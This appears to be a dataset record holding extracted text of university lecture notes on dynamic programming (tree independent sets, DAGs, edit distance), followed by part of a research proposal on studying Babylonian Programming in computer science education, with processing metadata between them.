"google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18255, null]], "pdf_page_numbers": [[0, 1763, 1], [1763, 3382, 2], [3382, 4945, 3], [4945, 6313, 4], [6313, 7297, 5], [7297, 7934, 6], [7934, 9316, 7], [9316, 10943, 8], [10943, 12574, 9], [12574, 13440, 10], [13440, 14524, 11], [14524, 16160, 12], [16160, 17433, 13], [17433, 18255, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18255, 0.00257]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
c108beb275fb0281b00bd59c704529907edddc9a
Chapter 10 More Dynamic Programming OLD CS 473: Fundamental Algorithms, Spring 2015 February 19, 2015 10.1 Maximum Weighted Independent Set in Trees 10.1.0.1 Maximum Weight Independent Set Problem Input Graph \( G = (V, E) \) and weights \( w(v) \geq 0 \) for each \( v \in V \) Goal Find maximum weight independent set in \( G \) Maximum weight independent set in above graph: \( \{B, D\} \) 10.1.0.2 Maximum Weight Independent Set in a Tree Input Tree \( T = (V, E) \) and weights \( w(v) \geq 0 \) for each \( v \in V \) Goal Find maximum weight independent set in \( T \) Maximum weight independent set in above tree: ?? 10.1.0.3 Towards a Recursive Solution (A) For an arbitrary graph \( G \): (A) Number vertices as \( v_1, v_2, \ldots, v_n \) (B) Find recursively optimum solutions without \( v_n \) (recurse on \( G - v_n \)) and with \( v_n \) (recurse on \( G - v_n - N(v_n) \) & include \( v_n \)). (C) Saw that if graph $G$ is arbitrary there was no good ordering that resulted in a small number of subproblems. (B) What about a tree? (C) Natural candidate for $v_n$ is root $r$ of $T$? 10.1.0.4 Towards a Recursive Solution (A) Natural candidate for $v_n$ is root $r$ of $T$? (B) Let $O$ be an optimum solution to the whole problem. Case $r \not\in O$ : Then $O$ contains an optimum solution for each subtree of $T$ hanging at a child of $r$. Case $r \in O$ : None of the children of $r$ can be in $O$. $O - \{r\}$ contains an optimum solution for each subtree of $T$ hanging at a grandchild of $r$. (C) Subproblems? (D) Subtrees of $T$ hanging at nodes in $T$. 10.1.0.5 A Recursive Solution (A) $T(u)$: subtree of $T$ hanging at node $u$. (B) $OPT(u)$: max weighted independent set value in $T(u)$. (C) $OPT(u) = \max \left\{ \sum_{v \text{ child of } u} OPT(v), \ w(u) + \sum_{v \text{ grandchild of } u} OPT(v) \right\}$ 10.1.0.6 Iterative Algorithm (A) Compute $OPT(u)$ bottom up. To evaluate $OPT(u)$ need to have computed values of all children and grandchildren of $u$ (B) What is an ordering of nodes of a tree $T$ to achieve above? (C) Post-order traversal of a tree. 10.1.0.7 Iterative Algorithm (A) Code: MIS-Tree($T$): Let $v_1, v_2, \ldots, v_n$ be a post-order traversal of nodes of $T$ for $i = 1$ to $n$ do \[ M[v_i] = \max \left( \sum_{v_j \text{ child of } v_i} M[v_j], \ w(v_i) + \sum_{v_j \text{ grandchild of } v_i} M[v_j] \right) \] return $M[v_n]$ (* Note: $v_n$ is the root of $T$ *) (B) **Space:** $O(n)$ to store the value at each node of $T$. (C) **Running time:** (A) Naive bound: $O(n^2)$ since each $M[v_i]$ evaluation may take $O(n)$ time and there are $n$ evaluations. (B) Better bound: $O(n)$. A value $M[v_j]$ is accessed only by its parent and grand parent. 10.1.0.8 Example 10.1.0.9 Dominating set **Definition 10.1.1.** $G = (V, E)$. The set $X \subseteq V$ is a dominating set, if any vertex $v \in V$ is either in $X$ or is adjacent to a vertex in $X$. **Problem 10.1.2.** Given weights on vertices, compute the minimum weight dominating set in $G$. **Dominating Set** is NP-Hard! 10.2 DAGs and Dynamic Programming 10.2.0.10 Recursion and DAGs **Observation 10.2.1.** Let $A$ be a recursive algorithm for problem $\Pi$. For each instance $I$ of $\Pi$ there is an associated DAG $G(I)$. (A) Create directed graph $G(I)$ as follows... (B) For each sub-problem in the execution of $A$ on $I$ create a node. (C) If sub-problem $v$ depends on or recursively calls sub-problem $u$ add directed edge $(u, v)$ to graph. (D) $G(I)$ is a DAG. Why? If $G(I)$ has a cycle then $A$ will not terminate on $I$. 10.2.1 Iterative Algorithm for... 10.2.1.1 Dynamic Programming and DAGs **Observation 10.2.2.** An iterative algorithm $B$ obtained from a recursive algorithm $A$ for a problem $\Pi$ does the following: *For each instance $I$ of $\Pi$, it computes a topological sort of $G(I)$ and evaluates sub-problems according to the topological ordering.* (A) Sometimes the DAG $G(I)$ can be obtained directly without thinking about the recursive algorithm $A$ (B) In some cases (*not all*) the computation of an optimal solution reduces to a shortest/longest path in DAG $G(I)$ (C) Topological sort based shortest/longest path computation is dynamic programming! 10.2.2 A quick reminder... 10.2.2.1 A Recursive Algorithm for weighted interval scheduling Let $O_i$ be value of an optimal schedule for the first $i$ jobs. ``` Schedule(n): if $n = 0$ then return 0 if $n = 1$ then return $w(v_1)$ $O_{p(n)} \leftarrow \text{Schedule}(p(n))$ $O_{n-1} \leftarrow \text{Schedule}(n - 1)$ if $(O_{p(n)} + w(v_n) < O_{n-1})$ then $O_n = O_{n-1}$ else $O_n = O_{p(n)} + w(v_n)$ return $O_n$ ``` 10.2.3 Weighted Interval Scheduling via... 10.2.3.1 Longest Path in a DAG Given intervals, create a DAG as follows: (A) Create one node for each interval, plus a dummy sink node 0 for interval 0, plus a dummy source node $s$. (B) For each interval \( i \) add edge \((i, p(i))\) of the length/weight of \( v_i \). (C) Add an edge from \( s \) to \( n \) of length 0. (D) For each interval \( i \) add edge \((i, i - 1)\) of length 0. 10.2.3.2 Example \[ \begin{array}{cccc} 30 & 70 & 3 & 80 \\ 1 & 4 & 2 & 5 \end{array} \] \( p(5) = 2,\ p(4) = 1,\ p(3) = 1,\ p(2) = 0,\ p(1) = 0 \) 10.2.3.3 Relating Optimum Solution (A) Given interval problem instance \( I \) let \( G(I) \) denote the DAG constructed as described. (B) We have... \textbf{Claim 10.2.3.} Optimum solution to weighted interval scheduling instance \( I \) is given by longest path from \( s \) to 0 in \( G(I) \). (C) Assuming claim is true, (A) If \( I \) has \( n \) intervals, \( \text{DAG} \ G(I) \) has \( n + 2 \) nodes and \( O(n) \) edges. Creating \( G(I) \) takes \( O(n \log n) \) time: to find \( p(i) \) for each \( i \). How? (B) Longest path can be computed in \( O(n) \) time — recall \( O(m + n) \) algorithm for shortest/longest paths in DAGs. 10.2.3.4 DAG for Longest Increasing Sequence Given sequence \( a_1, a_2, \ldots, a_n \) create \( \text{DAG} \) as follows: (A) add sentinel \( a_0 \) to sequence where \( a_0 \) is less than smallest element in sequence (B) for each \( i \) there is a node \( v_i \) (C) if \( i < j \) and \( a_i < a_j \) add an edge \((v_i, v_j)\) (D) find longest path from \( v_0 \) 10.3 Edit Distance and Sequence Alignment 10.3.0.5 Spell Checking Problem (A) Given a string “exponent” that is not in the dictionary, how should a spell checker suggest a nearby string? (B) What does nearness mean? (C) Question: Given two strings $x_1x_2\ldots x_n$ and $y_1y_2\ldots y_m$ what is a distance between them? (D) Edit Distance: minimum number of “edits” to transform $x$ into $y$. 10.3.0.6 Edit Distance **Definition 10.3.1.** Edit distance between two words $X$ and $Y$ is the number of letter insertions, letter deletions and letter substitutions required to obtain $Y$ from $X$. **Example 10.3.2.** The edit distance between FOOD and MONEY is at most 4: $\underline{\text{FOOD}} \rightarrow \underline{\text{MOOD}} \rightarrow \underline{\text{MONOD}} \rightarrow \underline{\text{MONED}} \rightarrow \text{MONEY}$ 10.3.0.7 Edit Distance: Alternate View Alignment Place words one on top of the other, with gaps in the first word indicating insertions, and gaps in the second word indicating deletions. ``` F O O D M O N E Y ``` Formally, an alignment is a set $M$ of pairs $(i, j)$ such that each index appears at most once, and there is no “crossing”: $i < i'$ and $i$ is matched to $j$ implies $i'$ is matched to $j' > j$. In the above example, this is $M = \{(1, 1), (2, 2), (3, 3), (4, 5)\}$. Cost of an alignment is the number of mismatched columns plus number of unmatched indices in both strings. 10.3.0.8 Edit Distance Problem Problem Given two words, find the edit distance between them, i.e., an alignment of smallest cost. 10.3.0.9 Applications (A) Spell-checkers and Dictionaries (B) Unix diff (C) DNA sequence alignment ... but, we need a new metric 10.3.0.10 Similarity Metric Definition 10.3.3. For two strings $X$ and $Y$, the cost of alignment $M$ is (A) [Gap penalty] For each gap in the alignment, we incur a cost $\delta$. (B) [Mismatch cost] For each pair $p$ and $q$ that have been matched in $M$, we incur cost $\alpha_{pq}$; typically $\alpha_{pp} = 0$. Edit distance is special case when $\delta = \alpha_{pq} = 1$. 10.3.0.11 An Example Example 10.3.4. <table> <thead> <tr> <th></th> <th>o</th> <th>c</th> <th>c</th> <th>u</th> <th>r</th> <th>r</th> <th>a</th> <th>n</th> <th>c</th> <th>e</th> </tr> </thead> <tbody> <tr> <td></td> <td>o</td> <td>c</td> <td>c</td> <td>u</td> <td>r</td> <td>r</td> <td>e</td> <td>n</td> <td>c</td> <td>e</td> </tr> </tbody> </table> Cost = $\delta + \alpha_{ae}$ Alternative: <table> <thead> <tr> <th></th> <th>o</th> <th>c</th> <th>c</th> <th>u</th> <th>r</th> <th>r</th> <th>a</th> <th>n</th> <th>c</th> <th>e</th> </tr> </thead> <tbody> <tr> <td></td> <td>o</td> <td>c</td> <td>c</td> <td>u</td> <td>r</td> <td>r</td> <td>e</td> <td>n</td> <td>c</td> <td>e</td> </tr> </tbody> </table> Cost = $3\delta$ Or a really stupid solution (delete string, insert other string): <table> <thead> <tr> <th></th> <th>o</th> <th>c</th> <th>u</th> <th>r</th> <th>r</th> <th>a</th> <th>n</th> <th>c</th> <th>e</th> </tr> </thead> <tbody> <tr> <td></td> <td>o</td> <td>c</td> <td>c</td> <td>u</td> <td>r</td> <td>r</td> <td>e</td> <td>n</td> <td>c</td> </tr> </tbody> </table> Cost = $19\delta$. 10.3.0.12 Sequence Alignment **Input** Given two words $X$ and $Y$, and gap penalty $\delta$ and mismatch costs $\alpha_{pq}$ **Goal** Find alignment of minimum cost 10.3.1 Edit distance 10.3.1.1 Basic observation (A) Let \( X = \alpha x \) and \( Y = \beta y \). (B) \( \alpha, \beta \): strings. \( x \) and \( y \) single characters. (C) Optimal edit distance between \( X \) and \( Y \) as alignment. Consider last column of alignment of the two strings: \[ \begin{array}{ccc} \alpha & x \\ \beta & y \\ \end{array} \] or \[ \begin{array}{ccc} \alpha & x \\ \beta y & \\ \end{array} \] or \[ \begin{array}{ccc} \alpha x \\ \beta & y \\ \end{array} \] Observation 10.3.5. PREFIXES MUST HAVE OPTIMAL ALIGNMENT! 10.3.1.2 Problem Structure Observation 10.3.6. Let \( X = x_1x_2\cdots x_m \) and \( Y = y_1y_2\cdots y_n \). If \((m, n)\) are not matched then either the \(m\)th position of \( X \) remains unmatched or the \(n\)th position of \( Y \) remains unmatched. (A) Case \( x_m \) and \( y_n \) are matched. (A) Pay mismatch cost \( \alpha_{x_m y_n} \) plus cost of aligning strings \( x_1\cdots x_{m-1} \) and \( y_1\cdots y_{n-1} \) (B) Case \( x_m \) is unmatched. (A) Pay gap penalty plus cost of aligning \( x_1\cdots x_{m-1} \) and \( y_1\cdots y_n \) (C) Case \( y_n \) is unmatched. (A) Pay gap penalty plus cost of aligning \( x_1\cdots x_m \) and \( y_1\cdots y_{n-1} \) 10.3.1.3 Subproblems and Recurrence Optimal Costs Let \( \text{Opt}(i, j) \) be optimal cost of aligning \( x_1\cdots x_i \) and \( y_1\cdots y_j \). Then \[ \text{Opt}(i, j) = \min \begin{cases} \alpha_{x_i y_j} + \text{Opt}(i - 1, j - 1), \\ \delta + \text{Opt}(i - 1, j), \\ \delta + \text{Opt}(i, j - 1) \end{cases} \] Base Cases: \( \text{Opt}(i, 0) = \delta \cdot i \) and \( \text{Opt}(0, j) = \delta \cdot j \) 10.3.1.4 Dynamic Programming Solution \[ \begin{align*} \text{for all } i & \text{ do } M[i, 0] = i\delta \\ \text{for all } j & \text{ do } M[0, j] = j\delta \\ \text{for } i = 1 \text{ to } m & \text{ do } \\ & \text{ for } j = 1 \text{ to } n \text{ do } \\ & \quad M[i, j] = \min \begin{cases} \alpha_{x_i y_j} + M[i - 1, j - 1], \\ \delta + M[i - 1, j], \\ \delta + M[i, j - 1] \end{cases} \end{align*} \] Analysis Figure 10.1: Iterative algorithm in previous slide computes values in row order. Optimal value is a shortest path from \((0,0)\) to \((m,n)\) in DAG. (A) Running time is \(O(mn)\). (B) Space used is \(O(mn)\). ### 10.3.1.5 Matrix and DAG of Computation ### 10.3.1.6 Sequence Alignment in Practice (A) Typically the DNA sequences that are aligned are about \(10^5\) letters long! (B) So about \(10^{10}\) operations and \(10^{10}\) bytes needed (C) The killer is the 10GB storage (D) Can we reduce space requirements? ### 10.3.1.7 Optimizing Space (A) Recall \[ M(i,j) = \min \begin{cases} \alpha_{x_iy_j} + M(i-1,j-1), \\ \delta + M(i-1,j), \\ \delta + M(i,j-1) \end{cases} \] (B) Entries in \(j\)th column only depend on \((j-1)\)st column and earlier entries in \(j\)th column (C) Only store the current column and the previous column reusing space; \(N(i,0)\) stores \(M(i,j-1)\) and \(N(i,1)\) stores \(M(i,j)\) 10.3.1.8 Computing in column order to save space 10.3.1.9 Space Efficient Algorithm ```plaintext for all i do \( N[i, 0] = i \delta \) for \( j = 1 \) to \( n \) do \( N[0, 1] = j \delta \) (* corresponds to \( M(0, j) \) *) for \( i = 1 \) to \( m \) do \( N[i, 1] = \min \left\{ \alpha_{x_i y_j} + N[i-1, 0], \delta + N[i-1, 1], \delta + N[i, 0] \right\} \) for \( i = 1 \) to \( m \) do Copy \( N[i, 0] = N[i, 1] \) ``` Analysis Running time is \( O(mn) \) and space used is \( O(2m) = O(m) \) 10.3.1.10 Analyzing Space Efficiency (A) From the \( m \times n \) matrix \( M \) we can construct the actual alignment (exercise) (B) Matrix \( N \) computes cost of optimal alignment but no way to construct the actual alignment (C) Space efficient computation of alignment? More complicated algorithm — see textbook. 10.3.1.11 Takeaway Points (A) Dynamic programming is based on finding a recursive way to solve the problem. Need a recursion that generates a small number of subproblems. (B) Given a recursive algorithm there is a natural DAG associated with the subproblems that are generated for given instance; this is the dependency graph. An iterative algorithm simply evaluates the subproblems in some topological sort of this DAG. (C) The space required to evaluate the answer can be reduced in some cases by a careful examination of that dependency DAG of the subproblems and keeping only a subset of... the DAG at any time. Bibliography
{"Source-Url": "https://courses.engr.illinois.edu/cs473/sp2015/w/lec/10_notes.pdf", "len_cl100k_base": 4834, "olmocr-version": "0.1.48", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 34431, "total-output-tokens": 5552, "length": "2e12", "weborganizer": {"__label__adult": 0.0003719329833984375, "__label__art_design": 0.0005388259887695312, "__label__crime_law": 0.0005755424499511719, "__label__education_jobs": 0.00814056396484375, "__label__entertainment": 0.0001252889633178711, "__label__fashion_beauty": 0.00023353099822998047, "__label__finance_business": 0.0005393028259277344, "__label__food_dining": 0.0005178451538085938, "__label__games": 0.0009560585021972656, "__label__hardware": 0.0015087127685546875, "__label__health": 0.0008306503295898438, "__label__history": 0.0005588531494140625, "__label__home_hobbies": 0.00027680397033691406, "__label__industrial": 0.0008559226989746094, "__label__literature": 0.0005211830139160156, "__label__politics": 0.00035381317138671875, "__label__religion": 0.0005555152893066406, "__label__science_tech": 0.212890625, "__label__social_life": 0.0001906156539916992, "__label__software": 0.01311492919921875, "__label__software_dev": 0.7548828125, "__label__sports_fitness": 0.0004620552062988281, "__label__transportation": 0.0008616447448730469, "__label__travel": 0.0002875328063964844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 13683, 0.04294]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 13683, 0.32145]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 13683, 0.72596]], "google_gemma-3-12b-it_contains_pii": [[0, 939, false], [939, 2170, null], [2170, 3291, null], [3291, 4961, null], [4961, 6344, null], [6344, 7777, null], [7777, 9188, null], [9188, 11280, null], [11280, 12205, null], [12205, 13650, null], [13650, 13671, null], [13671, 13671, null], [13671, 13683, null]], "google_gemma-3-12b-it_is_public_document": [[0, 939, true], [939, 2170, null], [2170, 3291, null], [3291, 4961, null], [4961, 6344, null], [6344, 7777, null], [7777, 9188, null], [9188, 11280, null], [11280, 12205, null], [12205, 13650, null], [13650, 13671, null], [13671, 13671, null], [13671, 13683, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 13683, null]], "pdf_page_numbers": [[0, 939, 1], [939, 2170, 2], [2170, 3291, 3], [3291, 4961, 4], [4961, 6344, 5], [6344, 7777, 6], [7777, 9188, 7], [9188, 11280, 8], [11280, 12205, 9], [12205, 13650, 10], [13650, 13671, 11], [13671, 13671, 12], [13671, 13683, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 13683, 0.03475]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
087c8d8a32dfdc77fcbdb982b1346e593b9334f7
Toward Studying Example-Based Live Programming in CS/SE Education Eva Krebs eva.krebs@hpi.uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Toni Mattis toni.mattis@hpi.uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Patrick Rein patrick.rein@hpi.uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Robert Hirschfeld robert.hirschfeld@uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Abstract Source code is inherently abstract. While this is necessary to capture the generality of a program, it poses a barrier to understanding and learning to use the underlying concepts. In education, especially in abstract subjects like maths, the use of concrete examples is considered instrumental to the acquisition of knowledge and a frequently explored direction for teaching computational concepts. Besides concreteness, the importance of examples being close to their abstract descriptions as well as the immediacy of feedback has been highlighted. Babylonian Programming (BP) is a type of example-based live programming that fulfills all three criteria by introducing concrete values, moving them as close as possible to the code, and updating them immediately in response to changes of either the example or the code. This makes BP a promising tool in education, yet no studies on the suitability of BP in a learning context have been conducted. Hence, we propose to (1.) investigate usability of state-of-the-art BP to minimize the friction of introducing BP in education, and (2.) measure the learning effectiveness and quality of experience of a BP environment in undergraduate software engineering education. For these studies, we will use the Smalltalk-based Babylonian/S as our environment. Besides clearer guidelines on the design of BP and example-based systems in general, we expect to shed light on the qualities that teacher-provided examples need to exhibit and the opportunities for learners to create their own examples during experimentation with unknown concepts. Keywords: live programming, exploratory programming, example-based programming, babylonian programming, examples, squeak, smalltalk, education ACM Reference Format: 1 Introduction The abstract nature of source code poses a challenge to teaching programming and computational concepts. Fortunately, abstract concepts can be conveyed effectively by the use of examples, as the use of worked examples in both math and CS education demonstrates. Most examples in programming education either have the goal to illustrate the workings of an algorithm or program using concrete values (code tracing examples) or demonstrate how a program is supposed to be constructed (code generation examples) [7]. In practice, both learning objectives are interwoven: understanding the parts of a larger program (e.g., the standard library) by seeing them operate on concrete values can help learners form sub-goals that help them solve new tasks requiring code generation. Muldner et al. [7] identified the problem of making examples available and semantically close enough to the learners’ task as a major open research direction. There is also little research in how to effectively empower students to self-explain and experiment with code and computational concepts themselves. Moreover, the focus of the majority of previous studies is on relatively self-contained algorithmic examples that provide excellent opportunities to make use of rich visualizations due to their small scope, but such approaches do not generalize to advanced topics, such as teaching design patterns or complex libraries. What is known, however, is that the effectiveness of examples is highly influenced by their proximity to the abstract concept they illustrate: Examples that are separated from what they illustrate are less effective. This is known as the *split-attention effect* [3]. While the ideal situation of simultaneously presenting an example for an abstract concept can only be achieved by using sensorially different channels (e.g., listening to instructions while seeing a concrete example unfold), using the same medium, such as the computer screen, can likely benefit from bringing abstract and concrete elements closer together in *space* - e.g., demonstrating the effect of a line of code next to it - and in *time* - e.g., having up-to-date examples available immediately. A third dimension, *semantic proximity*, can play an important role if the goal is to understand a concept well enough to re-use it. Examples with a large semantic distance are not perceived as applicable to a problem (however, an exact semantic match invites copying and does not contribute much to a learning outcome). For instance, demonstrating a sorting algorithm with numbers helps understand the algorithm itself, but not necessary how it can be used to sort composite data. ### 1.1 From Textbooks to Live Examples Understanding source code involves mental simulation. Especially when learners lack sufficient experience to quickly recognize plans, fine-grained mental simulation can take most of the effort to understand a program - sometimes to a degree that requires pen and paper on the side. At the same time, abstractions they encounter or need to use to solve a task (e.g., standard library calls) might be opaque as long as the vocabulary is still unknown. Although concrete examples might be available (e.g., textbooks, documentation, or StackOverflow), learners must deliberately seek them out, recognize which are useful, and map them back into their current task context, which is a distinct skill on its own. **IDEs and examples.** Modern general-purpose programming environments introduce interactivity to support both mental simulation and understanding of abstractions to some degree. A read-eval-print loop (REPL) might invite experimentation, but learners must come up with suitable examples to try. Automated tests can contain relatively complete examples that run parts of the system, but they are often located away from the code and thus harder to discover. The PyRet language ¹, in contrast, motivates tests directly following the definition of a function via its *where*-syntax. Besides the challenge of generating or finding suitable examples, learners are also facing the challenge of learning about how the program operates on the example data. The print statement is a ubiquitous way to observe dynamic behavior, but the resulting log needs to be put back into context (which might require careful formatting to recognize which statement produced which output) and is typically limited to textual representations. Most debuggers allow stopping the program at any point and inspecting its state. This allows learners to access a rich representation of composite data at a particular point in time, unfortunately with little support to easily keep track over time or quickly return to certain point after changes have been made. **Example-centric programming.** These problems have subsequently been addressed by treating examples as first-class entities in the programming environment rather than an artifact that needs to be manually constructed from, e.g., tests and print statements. Example-centric programming [5] first attempted to provide programmers with a side-by-side view of how state evolves as code is being run, e.g., from a 1. [https://pyret.org/](https://pyret.org/) test case. In Newspeak, Exemplars [1] are annotations that provide examples to methods, so that code is always ready for evaluation. By restricting the domain to certain data structures, richer visual representations of state evolution can be used - an example is the Kanon [9] system that synchronizes data structure visualization with step-wise code execution, highlights changes, and maps them back to the code that caused them. By maintaining the impression that the observable behavior of the example immediately responds to changes to either the program or the example - which is called liveness [13] - a class of systems named Example-based Live Programming (ELP) encourages experimentation and exploration by avoiding re-compile and re-run cycles. Babylonian Programming. While side-by-side views of code and example can implement rich visualizations on the "example side", the program itself remains spatially separated from the concrete state and behavior. Babylonian Programming (BP) [10] is an ELP system that moves examples even closer to the code by displaying concrete data at expression level. The example is always executable and reacts to changes immediately, e.g., the displayed intermediate values are always reflecting the most up-to-date behavior. In summary, examples in programming environments form a spectrum with regard to how close they are to the source code, with external documentation being the least accessible and semantically the least related (see Figure 1). General-purpose IDEs technically support examples but not very well. Example-centric environments are designed to support examples - often in a side-by-side view, and Babylonian Programming further integrates first-class examples into the code itself. However, BP has not yet been studied in educational contexts, although it optimizes several dimensions that can appeal to learners: proximity of examples minimizes the split-attention effect and displaying dynamic information over time supports mental simulation. BP can serve a double role in education as it allows educators to annotate code as a form of live documentation and invites learners to experiment due to its liveness. 2 Babylonian Programming Babylonian Programming (BP) is inspired by the way ancient Babylonians expressed their algorithms - in terms of concrete examples right next to the instructions [10]. Fortunately, we are not restricted to clay tablets anymore. A BP-enabled IDE introduces several concepts: (1) the Example, (2) Probes as a way to observe concrete behavior, and (3) Replacements to override expressions with user-controlled values as illustrated in Figure 2. Example. In BP, an Example provides concrete values to be able to run a particular section of code and, optionally, ![Figure 2](image-url) Figure 2. Core elements of Babylonian Programming: The programmer-curated Example (1) provides an instance of the class and arguments for the method call to construct a full execution context. Probes (2) render dynamic data captured during execution of the method – here, the content of the canvas – and are always updated immediately after code or Example changes. Replacements (3) allow programmers to isolate the Example from irrelevant state by skipping the execution of an expression and proceeding as if it evaluated to certain value. display its final result. In object-oriented environments, this includes example instances of classes, so that a realistic value of self can be assumed, as well as example arguments needed by a method call. Examples can be created using specialized tools, e.g., by writing their set-up code manually or selecting and persisting concrete values observed during run-time. Probe. A Probe can be attached to any expression, showing its value under the currently active Example(s). Probes are updated immediately on each change, i.e., the affected code path is being re-executed in the background. They can use rich, domain-specific visualizations, e.g. displaying the content of a drawing buffer to help users trace its evolution. If they are affected by multiple times (e.g. in a loop), they can visualize their value’s evolution either textually or using domain-specific representations again, such as sparklines. Probes can be anywhere in the control flow of an example, allowing users to trace concrete behavior deep into method calls. Replacement. A Replacement can override an expression and provide a fixed value instead. This can make an Example more self-contained by avoiding unrelated computation, e.g., bypassing user input by just assuming they provided certain input. It also encourages experimenting with what-if scenarios, e.g., by allowing to see the behavior if certain call returned something else. 2.1 Implementations of Babylonian Programming Babylonian Programming was initially implemented in the web-based live programming environment Lively4 [6] for the JavaScript language as Babylonian/JS [10]. A subsequent extension of the Language Server Protocol (LSP) enabled a language-agnostic implementation in Visual Studio Code based on the GraalVM runtime [8]. The implementation with the most complete integration into existing tools, however, is an implementation in Squeak/Smalltalk called Babylonian/S [12]. It provides access to examples, probes, and replacements directly in the code editor, debugger, and inspection tools. Figure 3 shows a screenshot of Babylonian/S. Due to its seamless integration, we will use Babylonian/S for our studies. 2.2 The Case for Babylonian Programming in Education The design of BP targets programmers in general, but we argue that its core concepts lend itself to overcome learning obstacles rooted in the split-attention effect. Additionally, BP has the potential to support mental simulation by observing the effects of any statement or expression in terms of concrete values. Assisting sub-goal formation through live documentation. Examples can be used to equip existing functionality (e.g. from the standard library) with a live documentation that helps learners identify the building blocks needed to solve a programming task. By providing an example-based big picture of the environment and its concepts, we expect examples to provide cues that positively affect the formation of sub-goals [2] during programming tasks, e.g., seeing a concrete demonstration what certain functions do might be more approachable than traditional documentation and learners might be encouraged to try out functionality they might have missed or re-implemented otherwise. Hence, we will explicitly study situations in which learners need awareness of code available in their environment to solve a programming task. Assisting self-explanation through easier simulation. Effective learners often engage in self-explanation [4], a process that draws on existing background knowledge and newly generated hypotheses to make sense of a problem or a solution presented as worked example “in their own words”. This may even include visualizing processes using pen and paper. In the context of teaching programming, learners are frequently observed to give explanations in terms of the concrete dynamic behavior they observe - for example the results of print statements [14]. BP has the potential to assist self-explanation by making it easier to mentally trace what a program does, possibly eliminating the need to use print statements or minimize situations that demand pen-and-paper self-explanations. Learning non-localized concepts. Previous approaches to improve the learning experience and effectiveness focus on individual algorithms and smaller programs. This is needed for beginners and allows the use of rich specialized visualizations in live examples. BP has the potential to better support advanced learning goals because Examples can be traced through arbitrarily nested calls, allowing realistic examples to co-exist with small examples that illustrate basic principles. For example, collection functions might be documented using lists of integers as examples, while a part of a game is equipped with a realistic example simulating player behavior. If that part in turn uses collection functions, learners can explore realistic usage scenarios with live data as well. Teaching architectural concepts, e.g. design patterns, can benefit as well as BP easily scales to concepts spanning multiple components. Approaching other domains through programming. The learning objectives supported by BP are not constrained to programming concepts alone. Many programs eventually model real-world domains. Working on such programs can be an effective way to teach that domain (e.g. teaching basic laws of ecosystems using a cellular automaton). BP allows teachers to introduce executable domain-specific examples. From this perspective, the program is a notation to formalize the phenomena in the domain and Examples make this notation approachable. Future implementations of BP might even support domain-specific visualizations. 3 Studying Babylonian Programming Babylonian Programming is a novel concept not yet established in an industrial or educational context. Thus, we propose two studies: A study that aims to provide a broad understanding of how Babylonian Programming can be used and a second study that is specifically designed to test its use in an educational context. While there are specific use cases for Babylonian Programming and its tools, there is currently little knowledge on when and how it is used in general because of its novelty. In order to study the effect of examples and Babylonian Programming in education, we first need to enhance our understanding of it in general, such as which programming domains it is most suitable for, in which ways developers create and use examples, and so on. This study would also uncover possible limitations of Babylonian/S, our chosen Babylonian Programming environment, and its tools that should be addressed before conducting a more specialized study. 3.1 Study 1: General Usage of Babylonian Programming In this first study, we plan to observe how participants use Babylonian Programming. We both aim to see in which situations or domains Babylonian Programming is especially applicable for later studies as well as deepen our understanding of how Babylonian concepts are used at all. This will also enable us to address certain limitations of the concept or the Figure 3. A screenshot of Babylonian/S. Examples are defined at the top of the method, probes are added for visualizations directly in the code itself. Figure 4. Exploratory study design: Participants working on a self-chosen task can request assistance and experimenters can ask clarifying questions. Concrete tools before conducting further studies with and on Babylonian/S. Study Structure. We plan to observe participants working in a Babylonian/S system provided by us. We might ask questions during the study to confirm why participants decided to do a specific interaction with the system, if they feel blocked or unable to do something (see Figure 4). From this, we hope to gather insights on when and how participants use Babylonion Programming. Interesting topics include: - In which program domains is it used? Is Babylonian Programming suitable for the task the participant is working on? - In which programming situations is it used? Do participants use it to explore the system? Is it used for debugging? - How do participants get examples? Do they e.g. write scripts or they use live objects from the system? Do they have trouble with creating examples? - Which Babylonian/S tools and features are used? - What do participants want to do but cannot? Participants. We plan to recruit participants with varying knowledge levels from our faculty. As later studies, such as the second study detailed in subsection 3.2, are aimed at undergraduate students, people from that group will also be recruited for this study. All participants will receive a short training on Babylonian/S and the general live programming features of Squeak/Smalltalk so that no pre-existing familiarity with the system is required. Task Design. As we want to observe how participants use Babylonian Programming with as much freedom as possible, we will try to observe them exploring the system or working in self-chosen project. However, should we not find enough participants with projects suitable to our study or should all projects fall into only one or two domains, we will intervene by preparing tasks that cover a large variety of domains. We plan to focus on the following questions for evaluation: 1. We would like to see whether Babylonian Programming improves how long it takes students to finish a given task. 2. We would like to see how it impacts the students programming experience. We plan to focus on the following questions for evaluation: - Does Babylonian/S improve the correctness of results that students create? - Does Babylonian/S improve how engaging students perceive tasks to be? - Does 